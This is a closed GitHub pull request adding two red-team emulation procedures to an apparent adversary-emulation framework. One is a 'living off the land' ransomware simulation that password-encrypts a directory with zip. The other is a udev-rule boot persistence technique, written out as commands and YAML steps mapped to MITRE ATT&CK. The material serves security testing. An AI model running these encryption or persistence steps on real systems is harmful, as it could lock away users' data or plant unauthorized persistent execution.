-
Notifications
You must be signed in to change notification settings - Fork 22
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Impact and persistence TTPs #129
Closed
Closed
Changes from 2 commits
Commits
Show all changes
4 commits
Select commit
Hold shift + click to select a range
File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,51 @@ | ||
# LOTL Ransomware Encryption | ||
|
||
![Meta TTP](https://img.shields.io/badge/Meta_TTP-red) | ||
|
||
This TTP leverages the `zip` command available on Linux systems to encrypt files in a specified directory, simulating a ransomware attack using tools already present on the machine. The command encrypts the contents of the target directory and requires a password for decryption, illustrating a data encryption impact scenario often used by threat actors. | ||
|
||
## Arguments | ||
|
||
- **target_dir**: The directory to encrypt. | ||
|
||
Default: /dev/shm | ||
|
||
- **encryption_key**: The password used to encrypt the directory. | ||
|
||
Default: password | ||
|
||
## Requirements | ||
|
||
1. Access to a Linux system where the `zip` and `unzip` commands are available. | ||
2. Permission to modify files within the target directory. | ||
|
||
## Examples | ||
|
||
You can run the TTP using the following command (adjust arguments as needed): | ||
|
||
```bash | ||
ttpforge run forgearmory//impact/data-encrypt/LOTL-ransomware/LOTL-ransomware.yaml \ | ||
--arg target_dir="/path/to/target/dir" \ | ||
--arg encryption_key="your_encryption_key" | ||
``` | ||
|
||
## Steps | ||
|
||
1. **encrypt_dir**: Encrypts the specified directory using the provided encryption key. The directory is compressed into a zip file, which is encrypted with the password. | ||
|
||
```bash | ||
zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }} | ||
``` | ||
|
||
1. **cleanup**: Attempts to restore the original state by decrypting and unzipping the encrypted directory. | ||
|
||
```bash | ||
unzip -P {{ .Args.encryption_key }} ttpforge.zip | ||
``` | ||
|
||
## MITRE ATT&CK Mapping | ||
|
||
- **Tactics**: | ||
- TA0040 Impact | ||
- **Techniques**: | ||
- T1486 Data Encrypted for Impact |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,34 @@ | ||
--- | ||
api_version: 2.0 | ||
uuid: 0fc4bb3a-b864-4c33-8516-9b0654324ad9 | ||
name: "LOTL Ransomware" | ||
description: | | ||
"Threat actors often need to utilize tools that are prexisting on the machine in order to perform TTPs. Often times threat actors are able to utilize something as simple as the `zip` command in order to encrypt files on a machine." | ||
|
||
args: | ||
- name: target_dir | ||
decription: The directory which we will encrypt. | ||
default: /dev/shm | ||
- name: encryption_key | ||
description: The key which we will use to encrypt the data with. | ||
default: password | ||
|
||
requirements: | ||
platforms: | ||
- os: linux | ||
|
||
mitre: | ||
tactics: | ||
- "TA0040 Impact" | ||
techniques: | ||
- "T1486 Data Encrypted for Impact" | ||
|
||
steps: | ||
- name: encrypt_dir | ||
description: Encrypt provided directory | ||
inline: | | ||
zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }} | ||
|
||
cleanup: | ||
inline: | | ||
unzip -P {{ .Args.encryption_key }} ttpforge.zip | ||
gerbsec marked this conversation as resolved.
Show resolved
Hide resolved
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,58 @@ | ||
# UDEV Persistence Technique | ||
|
||
![Meta TTP](https://img.shields.io/badge/Meta_TTP-red) | ||
|
||
This TTP utilizes a method of establishing persistence by creating a script that is automatically executed at boot time when the `/dev/random` device is loaded. It leverages udev rules to execute the script, making this an effective technique for maintaining access during system initialization. | ||
|
||
## Arguments | ||
|
||
- **target_path**: The path where the script and udev rule will be created. | ||
|
||
Default: /dev | ||
|
||
## Requirements | ||
|
||
1. Access to a Linux system with permissions to modify udev rules. | ||
1. Ability to write files in critical system directories. | ||
|
||
## Examples | ||
|
||
You can run the TTP using the following command (adjust arguments as needed): | ||
|
||
```bash | ||
ttpforge run forgearmory//persistence/unix/udev-persistence/udev-persistence.yaml \ | ||
--arg target_path="/your/custom/path" | ||
``` | ||
|
||
## Steps | ||
|
||
1. **create_persistence_script**: Creates a script in the specified path that will be executed upon system boot. | ||
|
||
```bash | ||
#!/bin/bash | ||
echo "touch /root/exploited" > {{ .Args.target_path }}/udev.sh | ||
chmod 0600 {{ .Args.target_path }}/udev.sh | ||
``` | ||
|
||
1. **add_udev_rule**: Adds a udev rule that triggers the script execution when the `/dev/random` device is loaded at boot time. | ||
|
||
```bash | ||
echo 'ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="/bin/sh -c '{{ .Args.target_path }}/udev.sh'"' > /etc/udev/rules.d/75-persistence.rules | ||
``` | ||
|
||
## Cleanup | ||
|
||
1. **remove_udev_rule**: Deletes the udev rule from the system. | ||
|
||
```bash | ||
rm /etc/udev/rules.d/75-persistence.rules | ||
``` | ||
|
||
## MITRE ATT&CK Mapping | ||
|
||
- **Tactics**: | ||
- TA0003 Persistence | ||
- **Techniques**: | ||
- T1546 Event Triggered Execution | ||
- **Subtechniques**: | ||
- T1546.004 Unix Shell Configuration Modification |
38 changes: 38 additions & 0 deletions
38
ttps/persistence/linux/udev-persistence/udev-persistence.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,38 @@ | ||
--- | ||
api_version: 2.0 | ||
uuid: 96c74a6e-ecec-4559-846e-8027e1612a33 | ||
name: "UDEV Persistence Technique" | ||
description: | | ||
"This technique creates a script that is executed when the /dev/random device is loaded, which is typically at boot time. This method uses udev rules to achieve persistence by triggering the script execution during system initialization, establishing a low-level method for maintaining access." | ||
|
||
args: | ||
- name: target_path | ||
description: The path where the script and udev rule will be created. | ||
default: /dev | ||
|
||
requirements: | ||
platforms: | ||
- os: linux | ||
|
||
mitre: | ||
tactics: | ||
- "TA0003 Persistence" | ||
techniques: | ||
- "T1546 Event Triggered Execution" | ||
subtechniques: | ||
- "T1546.004 Event Triggered Execution: Unix Shell Configuration Modification" | ||
steps: | ||
- name: create_persistence_script | ||
decription: Create the script that will be executed at boot. | ||
create_file: {{ .Args.target_path }}/udev.sh | ||
contents: | ||
touch /root/exploited | ||
mode: 0600 | ||
cleanup: default | ||
|
||
- name: add_udev_rule | ||
description: Add a udev rule to trigger the script at boot when /dev/random is loaded. | ||
create_file: "/etc/udev/rules.d/75-persistence.rules" | ||
contents: ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="/bin/sh -c '{{ .Args.target_path }}/udev.sh'" | ||
cleanup: | ||
remove_path: "/etc/udev/rules.d/75-persistence.rules" |
Oops, something went wrong.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Looks like the directory to execute should be
forgearmory//impact/ltol-ransomware/lotl-ransomware.yaml
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Done